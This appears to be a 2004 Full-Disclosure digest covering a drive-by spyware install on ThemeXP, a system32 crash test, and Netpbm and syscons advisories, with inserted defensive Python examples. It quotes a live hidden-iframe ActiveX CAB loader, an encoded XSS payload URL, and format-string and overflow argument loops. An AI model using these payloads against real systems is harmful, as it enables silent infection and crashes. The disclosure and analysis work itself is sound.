> Willem Koenings
> Sent: Monday, October 04, 2004 9:55 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] Re: Spyware installs with no
> interaction in IE on fully patched XP SP2 box
>
>
> hi,
>
> > I was unable to verify it, since I don't use IE, and would
> prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with
> the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab
>
> W.
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Gossi The Dog (gossiabate.veritynet.net)
Date: Mon Oct 04 2004 - 10:15:46 CDT


Yes... ThemeXP.org has this in the HTML..

<!-- AUTO_PROMPT AD START --><script language="JavaScript" type="text/JavaScript" src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script><!-- AUTO_PROMPT AD END -->

Which calls...

http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js

Which contains...

                 document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');

               document_code = '<html><head>\n';
               document_code += '<\/head><body>\n';
               document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n';
               document_code += '<\/body><\/html>';
               downloads_manager.document.write(document_code);
               downloads_manager.document.close();

                 setCookie('minpopup80wu03rd','test',1);

...which downloads http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

...which means those using shitty MS browsers get owned, again.

If you want a laugh, replace the CAB files with WinVNC or somesuch.

--g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
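For anyone who wants to check a page for this pattern rather than load it in IE, here is an added example (written for this archive, not code from the thread or from addictivetechnologies.net): a small scanner that rebuilds the markup a loader script assembles through document_code concatenation and document.write(), then flags an <object> carrying an ActiveX classid with a codebase that ends in .cab, notes when it is zero-sized, and records iframes styled visibility:hidden or display:none. The embedded SAMPLE_JS is a constructed copy of the loader lines quoted above with the AffiliateID value shortened; the regexes and the reason labels are this example's own.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the loader lines quoted above, reassembled on single
# lines; only the AffiliateID value has been shortened.
SAMPLE_JS = r"""
document.write('<iframe id="downloads_manager" style="position:absolute;visibility:hidden;"></iframe>');
document_code = '<html><head>\n';
document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="x"></object>\n';
document_code += '<\/body><\/html>';
downloads_manager.document.write(document_code);
"""

JS_STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")            # a single-quoted JS literal
CLSID = re.compile(r"^clsid:[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)


def markup_from_loader(js):
    """Recover the markup a loader assembles by string concatenation and
    document.write(): take every single-quoted literal on lines that touch
    document_code or document.write and undo the \\/ and \\n escapes."""
    parts = []
    for line in js.splitlines():
        if "document_code" in line or "document.write" in line:
            parts.extend(JS_STRING.findall(line))
    return "".join(p.replace("\\/", "/").replace("\\n", "\n") for p in parts)


class DriveByScanner(HTMLParser):
    """Flag <object> tags that look like silent ActiveX CAB installs and
    iframes styled so the user never sees them."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self.hidden_iframes = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if "visibility:hidden" in style or "display:none" in style:
                self.hidden_iframes.append(a.get("id", ""))
        elif tag == "object":
            reasons = []
            classid = a.get("classid", "").strip()
            codebase = a.get("codebase", "").strip()
            if CLSID.match(classid):
                reasons.append("activex-classid")
            # codebase may carry a '#version=...' suffix; judge the path only
            if codebase.split("#", 1)[0].lower().endswith(".cab"):
                reasons.append("remote-cab-codebase")
            if a.get("height", "").strip() == "0" and a.get("width", "").strip() == "0":
                reasons.append("zero-size")
            if "activex-classid" in reasons and "remote-cab-codebase" in reasons:
                self.objects.append({"classid": classid, "codebase": codebase,
                                     "reasons": reasons})


def scan_html(html):
    """Return the drive-by indicators found in a piece of markup."""
    p = DriveByScanner()
    p.feed(html)
    p.close()
    return {"objects": p.objects, "hidden_iframes": p.hidden_iframes}


if __name__ == "__main__":
    print(scan_html(markup_from_loader(SAMPLE_JS)))
```

Run against the sample it reports one object (classid, CAB codebase, zero-size) and the hidden iframe "downloads_manager". A real page needs the fetched Confirm80wu03rd.js fed to markup_from_loader first, since the <object> never appears in the HTML the server sends.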


 
Re: [Full-Disclosure] Test your windows OS

From: KF_lists (kf_listssecnetops.com)
Date: Mon Oct 04 2004 - 11:02:11 CDT


On my win2k box with SP4
atmadm.exe crashed with the format string test.

csvde.exe ipconfig.exe ldifde.exe sort.exe all crashed on the bof test.
-KF

Berend-Jan Wever wrote:
> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows operating system have any clue as to what they're doing? Run these commands from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as many "A"s as cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most of them will either ignore the parameter or report an error because the parameter doesn't make sense... But on my win2k system I found 6 programs vulnerable to these very simple format string and BoF tests.... grpconv even gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in themselves: you cannot gain access or elevate privileges but I just wanted to let you know that these programmers did a sloppy job.
>
> Cheers,
> SkyLined
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
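The two cmd.exe loops quoted above start every executable in the foreground with no timeout, which is why the replies talk about reboots and windows piling up. As an added example (not SkyLined's command, and not tied to any specific binary named in the thread), the same smoke test as a Python harness: it feeds the %n run and the long-A run to each file, never waits longer than a timeout, and classifies the exit status so a crash is distinguishable from a usage error. The payload sizes, the verdict strings and the self_check() target (the running interpreter) are this example's choices.

```python
import os
import subprocess
import sys


def make_payloads(fmt_reps=20, overflow_len=8000):
    """The two argument shapes from the thread: a run of %n conversions
    (each one is a write if the argument ever reaches printf as the format)
    and a long run of 'A' (0x41; an overwritten return address shows up as
    0x41414141, or 0x00410041 when the program widened the argument to
    UTF-16 before copying it, which is what the grpconv EIP suggests)."""
    return {"format": "%n" * fmt_reps, "overflow": "A" * overflow_len}


def classify_exit(returncode):
    """Turn a child's exit status into a verdict. On POSIX a negative code
    is the number of the signal that killed the child. On Windows an
    unhandled exception exits with its NTSTATUS code, whose top two bits
    (0xC0000000) mark an error, e.g. 0xC0000005 STATUS_ACCESS_VIOLATION."""
    if returncode is None:
        return "timeout"
    if returncode < 0:
        return "crash(signal %d)" % -returncode
    code = returncode & 0xFFFFFFFF
    if code >= 0xC0000000:
        return "crash(ntstatus 0x%08X)" % code
    return "exit(%d)" % returncode


def fuzz_one(exe, args, timeout=5.0):
    """Run exe with args, no inherited stdin, no window to dismiss, and
    never waiting longer than timeout. Returns (verdict, stderr snippet)."""
    try:
        p = subprocess.run([exe] + list(args), stdin=subprocess.DEVNULL,
                           stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
                           timeout=timeout)
    except subprocess.TimeoutExpired:
        return "timeout", ""
    except OSError as e:  # not a runnable image, missing DLL, permission
        return "error(%s)" % e.__class__.__name__, ""
    return classify_exit(p.returncode), p.stderr[:200].decode("latin-1", "replace")


def fuzz_dir(directory, suffix=".exe", timeout=5.0):
    """Feed every payload to every *suffix file in directory and return the
    (name, payload label, verdict) triples that crashed or hung."""
    hits = []
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(suffix):
            continue
        for label, arg in make_payloads().items():
            verdict, _ = fuzz_one(os.path.join(directory, name), [arg], timeout)
            if verdict.startswith(("crash", "timeout")):
                hits.append((name, label, verdict))
    return hits


def self_check():
    """Show the harness tells a clean exit from a crash, using the running
    interpreter as the target: 'pass' exits 0, os.abort() dies by SIGABRT
    on POSIX (on Windows abort() exits with code 3 instead)."""
    clean, _ = fuzz_one(sys.executable, ["-c", "pass"])
    aborted, _ = fuzz_one(sys.executable, ["-c", "import os; os.abort()"])
    return clean, aborted


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: %s <directory, e.g. C:\\Windows\\system32>" % sys.argv[0])
    for name, label, verdict in fuzz_dir(sys.argv[1]):
        print("%-24s %-9s %s" % (name, label, verdict))
```

Run it on a copy of system32 in a throwaway VM, not on a working server; the timeout keeps GUI programs that open a window from blocking the run, and a "timeout" verdict is itself worth a look.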


 
Re: [Full-Disclosure] Test your windows OS

From: Alex (alexindefrogers.com)
Date: Mon Oct 04 2004 - 12:03:08 CDT


Oooo my...
Got around 12 of win32 executable crashes on my Win2K server with all
patches...
This is a much better tool than MS Baseline Security Analyzer :-(

----- Original Message -----
From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
To: <full-disclosurelists.netsys.com>
Sent: Monday, October 04, 2004 11:39 AM
Subject: [Full-Disclosure] Test your windows OS

> Hi all,
>
> Wanna do a quick test to see if the programmers that wrote your windows
> operating system have any clue as to what they're doing? Run these commands
> from cmd.exe in the system32 directory:
>
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as many "A"s as
> cmd.exe allows on one line.)
>
> Each command will execute every program in your system32 directory, most
> of them will either ignore the parameter or report an error because the
> parameter doesn't make sense... But on my win2k system I found 6 programs
> vulnerable to these very simple format string and BoF tests.... grpconv even
> gives EIP 0x00410041, can it be any easier?
>
> These are not vulnerabilities in themselves: you cannot gain access or elevate
> privileges but I just wanted to let you know that these programmers did a
> sloppy job.
>
> Cheers,
> SkyLined
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] [ GLSA 200410-02 ] Netpbm: Multiple temporary file issues

From: Thierry Carrez (koongentoo.org)
Date: Mon Oct 04 2004 - 12:25:55 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Netpbm: Multiple temporary file issues
      Date: October 04, 2004
      Bugs: #65647
        ID: 200410-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Utilities included in old Netpbm versions are vulnerable to multiple
temporary file issues, potentially allowing a local attacker to
overwrite files with the rights of the user running the utility.

Background
==========

Netpbm is a toolkit containing more than 200 separate utilities for
manipulation and conversion of graphic images.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-libs/netpbm <= 9.12-r4 >= 10.0

Description
===========

Utilities contained in the Netpbm package prior to the 9.25 version
contain defects in temporary file handling. They create temporary files
with predictable names without checking first that the target file
doesn't already exist.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When a
user or a tool calls one of the affected utilities, this would result
in file overwriting with the rights of the user running the utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Netpbm users should upgrade to an unaffected version:

    # emerge sync

    # emerge -pv ">=media-libs/netpbm-10.0"
    # emerge ">=media-libs/netpbm-10.0"

References
==========

  [ 1 ] CVE-2003-0924
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0924
  [ 2 ] US-CERT VU#487102
        http://www.kb.cert.org/vuls/id/487102

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
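The Description and Impact sections above describe the defect class without showing it. Here is an added example (not Netpbm code; the tool name "pnmtool", the prefix-plus-pid naming and the victim file are this example's assumptions) that runs the attack and the fix inside a private directory on a POSIX system: a symlink planted at the predictable name redirects a plain open() for writing into any file the victim can write, an open with O_CREAT|O_EXCL on the same name is refused by the kernel because the name already exists, and tempfile.mkstemp() avoids the guessable name altogether.

```python
import os
import tempfile


def predictable_name(tmpdir, tool="pnmtool", pid=None):
    """The naming scheme the advisory describes: a fixed prefix plus the
    pid, which any local user can read off ps."""
    return os.path.join(tmpdir, "%s%d" % (tool, os.getpid() if pid is None else pid))


def vulnerable_write(tmpdir, data):
    """open(..., 'w') is O_WRONLY|O_CREAT|O_TRUNC: it does not care whether
    the name already exists and it follows a symlink placed there."""
    path = predictable_name(tmpdir)
    with open(path, "w") as f:
        f.write(data)
    return path


def exclusive_write(tmpdir, data):
    """Same predictable name, but O_CREAT|O_EXCL (plus O_NOFOLLOW where the
    platform has it) makes the kernel refuse atomically when anything, a
    symlink included, already sits at that name. A guessable name is still
    a bad idea; this shows that the existence check must be in the open()."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(predictable_name(tmpdir), flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def safe_write(tmpdir, data):
    """What the fixed utilities should do: mkstemp() picks an unpredictable
    name and opens it with O_CREAT|O_EXCL in one step."""
    fd, path = tempfile.mkstemp(prefix="pnmtool.", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Run the attack in a private directory. 'victim.txt' stands in for
    any file the attacker wants overwritten with the victim's rights."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.txt")

        def reset():
            with open(victim, "w") as f:
                f.write("original")

        def current():
            with open(victim) as f:
                return f.read()

        # attacker: plant a symlink at the name the tool is about to create
        reset()
        os.symlink(victim, predictable_name(d))

        vulnerable_write(d, "clobbered")         # follows the link
        results["vulnerable"] = current()

        reset()
        try:
            exclusive_write(d, "clobbered")
            results["exclusive"] = "wrote"
        except OSError:                          # EEXIST: something is at that name
            results["exclusive"] = "refused"
        results["exclusive_victim"] = current()

        reset()
        safe_write(d, "clobbered")               # random name, link never touched
        results["safe"] = current()
    return results


if __name__ == "__main__":
    print(demo())
```

demo() returns "clobbered" for the vulnerable writer and "original" for the other two. Note that the victim in the advisory is whoever runs the utility, so a symlink into that user's home directory or, for root, into /etc is what an attacker would actually plant; the example keeps everything inside a temporary directory.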



 
[Full-Disclosure] [suse-security] Anti-Virus Problem

From: Björn Scorey (bjornscoreyhotmail.com)
Date: Mon Oct 04 2004 - 12:33:18 CDT


Hi Everyone !

I am running Suse 9.0 and I have installed

qmail (netqmail Ver. 1.05)
amavis (amavis-new Ver. 20030616p5-23)
antivir (Ver 2.08-16)

Antivir seems to be an evaluation version. (The one that came with Suse 9.0)

I downloaded the EICAR e-mail test virus but when I send either an infected attachment or simply copy the virus string into the mail, the antivirus doesn't recognize the virus, and the mail passes normally.

However when I run antivir on the infected file (attachment) by itself, it recognizes the virus. The same occurred with f-prot (however I got some minor errors while installing f-prot). When I run either anti-virus scanner on my mailbox (mbox), none of them manage to see the virus.

Does anyone have an idea what's wrong?

Regards
Björn

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Shows when no limits are set or restricted shell or bat access

From: KF_lists (kf_listssecnetops.com)
Date: Mon Oct 04 2004 - 14:38:49 CDT


I do not believe the point was to show that you can chew up system
resources... although that IS a side effect. That was not the point.

Add a sleep statement in there if it makes you feel better.
-KF

Clairmont, Jan M wrote:
>
> ;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> ;;for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as ;;much "A"-s as cmd.exe allows on one line.)
>
>
> Any system, UNIX at least, used to churn and eat system resources with a spawned
> shell; this is not new on any system. With unlimited program execution you can
> lock almost any system with a repeating shell program, but cute anyway. 8->
>
>
> Jan Clairmont
> Unix Security Support/Consultant
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Shows when no limits are set or restricted shell or bat access

From: Clairmont, Jan M (jan.m.clairmontcitigroup.com)
Date: Mon Oct 04 2004 - 14:08:40 CDT


;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
;;for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as ;;much "A"-s as cmd.exe allows on one line.)

Any system, UNIX at least, used to churn and eat system resources with a spawned
shell; this is not new on any system. With unlimited program execution you can
lock almost any system with a repeating shell program, but cute anyway. 8->

Jan Clairmont
Unix Security Support/Consultant
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Test your windows OS

From: Sean Crawford (sean01accnet.com.au)
Date: Mon Oct 04 2004 - 14:06:31 CDT


Alex Wrote-------------->

---> Oooo my...
---> Got around 12 of win32 executable crashes on my Win2K server with all
---> patches...
---> This is much better tool that MS Baseline Security analyzer :-(

Alex, I don't know why you would run it on a working server... did you
want to reboot anyway or something?

It's not exactly pen testing..

So what did you learn?

Thanks.
Sean.

---> From: "Berend-Jan Wever" <skylinededup.tudelft.nl>
---> To: <full-disclosurelists.netsys.com>
---> Sent: Monday, October 04, 2004 11:39 AM
---> Subject: [Full-Disclosure] Test your windows OS
--->
--->
---> > Hi all,
---> >
---> > Wanna do a quick test to see if the programmers that wrote
---> your windows
---> operating system have any clue as to what they're doing? Run
---> these commands
---> from cmd.exe in the system32 directory:
---> >
---> > for %i in (*.exe) do start %i
---> %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
---> > for %i in (*.exe) do start %i
---> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... (type as many "A"s as
---> cmd.exe allows on one line.)
---> >
---> > Each command will execute every program in your system32
---> directory, most
---> of them will either ignore the parameter or report an error because the
---> parameter doesn't make sense... But on my win2k system I found
---> 6 programs
---> vulnerable to these very simple format string and BoF tests....
---> grpconv even
---> gives EIP 0x00410041, can it be any easier?
---> >
---> > These are not vulnerabilities in themselves: you cannot gain
---> access or elevate
---> privileges but I just wanted to let you know that these
---> programmers did a
---> sloppy job.
---> >
---> > Cheers,
---> > SkyLined

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV]

From: Kolja Powischer (ultorgmx.net)
Date: Mon Oct 04 2004 - 14:38:56 CDT


Hi group,

> I don't think your super AV will detect the "eicar
> test string file" withing "NULL.con" folder??? :)

My AV detected the string... www.free-av.de H+BEDV Datentechnik GmbH.

> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.

Ok, how to delete that crap? Any idea?
Is it an NTFS error? I don't think so, because I wrote that directory
to a FAT32 filesystem...

bye
Kolja

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] XSS in "Spyware installs with no interaction in IE on fully patchedXP SP2 box"

From: jamie fisher (contact_jamie_fisheryahoo.co.uk)
Date: Mon Oct 04 2004 - 14:37:13 CDT


"'>&view=date&page=&cat=&name=blue+biohazard.zip">http://themexp.org//preview.php?mid=72936&type=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;poo%26quot;)>&view=date&page=&cat=&name=blue+biohazard.zip
 
Above is a measly example of XSS - upload any file you like, if you want, to the site with XSS; it seems to be open to all sorts - but I just spidered the web app and there appear to be quite a number of scripts that are pushing the applications down your wire... Not 100% sure, but I'd guess that since this seems to be the sort of site people would visit to get their Windows wares, it stands to reason that someone would upload a file like in the example above in order to do... I haven't had the opportunity to see where the .cab is being pushed from - whether on site or off. Would it be worth investigating?
 
Cheers

Willem Koenings <iseceurope.com> wrote:

hi,

> > I was unable to verify it, since I don't use IE, and would prefer not
> > infecting myself on accident, however I did run across this:
> >
> > http://themexp.org/about_wrap.php
> >
> > Perhaps one of the themes you downloaded was bundled with the spyware?
>
> two tiny links from there:
>
> http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js
> http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab

btw, old trusty IE 5.01 + manually configured security settings =
no problem at all. either XP+SP2 seriously broke something in IE
or Geraldo Rivera has just poorly configured Internet settings.

W.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
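The URL at the top of that message hides its payload under two encodings: the query value is percent-encoded for the URL, and inside it the characters of "javascript:" are written as HTML numeric character references (&#x6a; and so on), which a filter that greps the raw parameter for the word never sees, while the browser decodes them when it parses the attribute. As an added example (not from the post; the SAMPLE string is a constructed copy of the payload part of that URL, and the marker list in script_injection_in() is this example's own), here is how to peel the layers and why the check has to run on the decoded value:

```python
from html import unescape
from urllib.parse import unquote

# Constructed copy of the payload part of the URL quoted above
SAMPLE = ('"\'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;'
          '%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;'
          'alert(%26quot;poo%26quot;)>')


def decode_layers(s, max_rounds=5):
    """Apply percent-decoding then HTML character-reference decoding until
    the text stops changing. Returns every stage, outermost first, so you
    can see what each consumer in the chain (URL parser, then the HTML
    attribute parser) hands to the next."""
    stages = [s]
    for _ in range(max_rounds):
        nxt = unescape(unquote(stages[-1]))
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


def naive_filter_blocks(s):
    """A filter that greps the raw parameter for the word 'javascript'."""
    return "javascript" in s.lower()


def script_injection_in(s):
    """The check that survives the encoding trick: decode first, then look
    for a script URL scheme or an inline handler in the result."""
    final = decode_layers(s)[-1].lower().replace("\t", "").replace("\n", "")
    return any(marker in final for marker in ("javascript:", "vbscript:", "<script", "onerror="))


if __name__ == "__main__":
    for i, stage in enumerate(decode_layers(SAMPLE)):
        print("layer %d: %s" % (i, stage))
    print("naive filter blocks:", naive_filter_blocks(SAMPLE))
    print("decoded check flags:", script_injection_in(SAMPLE))
```

The second stage reads "'><img src=javascript:alert("poo")>; the naive filter passes the raw string and the decoded check flags it. The real fix on the server side is to HTML-encode the value when it is written into the page, not to pattern-match on input.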


 
[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1947 - 18 msgs

From: RMueller (randallmfidmail.com)
Date: Mon Oct 04 2004 - 15:27:00 CDT


Gossi wrote:

--__--__--

Message: 12
Date: Mon, 4 Oct 2004 10:15:46 -0500 (CDT)
From: Gossi The Dog <gossiabate.veritynet.net>
To: toddtowlesbrookshires.com, keydet89yahoo.com,
   full-disclosurelists.netsys.com
Cc: joelhelgeson.com, iamafraudhotmail.com
Subject: RE: [Full-Disclosure] Spyware installs with no interaction in IE on
 fully patched XP SP2 box

If you want a laugh, replace the CAB files which WinVNC or somesuch.

--g

--__--__--
 
 No that's not funny!! :)

I could not get anything to happen to my box which runs XP2 and google
blocker until I went to a page inside. Google showed no change in blocks but
IE showed warning of block and I found nothing in McAfee 8.0 or anything in
the logs. I didn't download anything though.

thanks
Randall


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV]

lee.e.riancensus.gov
Date: Mon Oct 04 2004 - 15:27:26 CDT


>Ok, how to delete that crap? Any idea?

from http://www.ss64.com/nt/del.html
Files are sometimes created with the reserved names: CON, AUX, COM1, COM2,
COM3, COM4, LPT1, LPT2, LPT3, PRN, NUL
To delete these use the syntax: DEL \\.\C:\somedir\LPT1

same idea using RMDIR to get rid of the directory

From: Kolja Powischer <ultorgmx.net>
Sent by: full-disclosure-adminlists.netsys.com
Date: 10/04/2004 03:38 PM
Please respond to: Kolja Powischer
To: full-disclosurelists.netsys.com
cc:
Subject: Re[2]: [Full-Disclosure] All Antivirus, Trojan, Spy ware scanner, Nested file manual scan bypass bugs. [Part IV]

Hi group,

> I don't think your super AV will detect the "eicar
> test string file" withing "NULL.con" folder??? :)

My AV detected the string... www.free-av.de H+BEDV Datentechnik GmbH.

> anyways... let me know HOW? when you figure out to how
> to delete "NULL.con" directory.

Ok, how to delete that crap? Any idea?
Is it an NTFS error? I don't think so, because I wrote that directory
to a FAT32 filesystem...

bye
Kolja

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] FreeBSD Security Advisory FreeBSD-SA-04:15.syscons

From: FreeBSD Security Advisories (security-advisoriesfreebsd.org)
Date: Mon Oct 04 2004 - 15:54:12 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-04:15.syscons Security Advisory
                                                          The FreeBSD Project

Topic: Boundary checking errors in syscons

Category: core
Module: sys_dev_syscons
Announced: 2004-10-04
Credits: Christer Oberg
Affects: FreeBSD 5.x releases
Corrected: 2004-09-30 17:49:15 UTC (RELENG_5, 5.3-BETA6)
                2004-10-04 17:04:25 UTC (RELENG_5_2, 5.2.1-RELEASE-p11)
CVE Name: CAN-2004-0919
FreeBSD only: YES

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
<URL:http://www.freebsd.org/security/>.

I. Background

syscons(4) is the default console driver for FreeBSD. Using the
physical keyboard and screen, it provides multiple virtual terminals
which appear as if they were separate terminals. One virtual terminal
is considered current and exclusively occupies the screen and the
keyboard; the other virtual terminals are placed in the background.

II. Problem Description

The syscons CONS_SCRSHOT ioctl(2) does insufficient validation of
its input arguments. In particular, negative coordinates or large
coordinates may cause unexpected behavior.

III. Impact

It may be possible to cause the CONS_SCRSHOT ioctl to return portions of
kernel memory. Such memory might contain sensitive information, such as
portions of the file cache or terminal buffers. This information might
be directly useful, or it might be leveraged to obtain elevated
privileges in some way. For example, a terminal buffer might include a
user-entered password.

IV. Workaround

There is no known workaround. However, this bug is only exploitable
by users who have access to the physical console or can otherwise open
a /dev/ttyv* device node.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to the RELENG_5_2 security branch
dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.2
systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:15/syscons.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:15/syscons.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.freebsd.org/handbook/kernelconfig.html> and reboot the
system.

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch Revision
  Path
- -------------------------------------------------------------------------
RELENG_5_2
  src/UPDATING 1.282.2.19
  src/sys/conf/newvers.sh 1.56.2.18
  src/sys/dev/syscons/syscons.c 1.409.2.1
- -------------------------------------------------------------------------

VII. References

<URL:http://cvsweb.freebsd.org/src/sys/dev/syscons/syscons.c.diff?r1=1.428&r2=1.429>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFBYYMTFdaIBMps37IRAuNbAJ4jbPnqo3vvEeD33ItW09r3zAuh5QCghq5v
SN4Y+OCpzJ7Szy3s++slzeQ=
=FlYi
-----END PGP SIGNATURE-----
_______________________________________________
freebsd-security-notificationsfreebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security-notifications
To unsubscribe, send any mail to "freebsd-security-notifications-unsubscribefreebsd.org"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
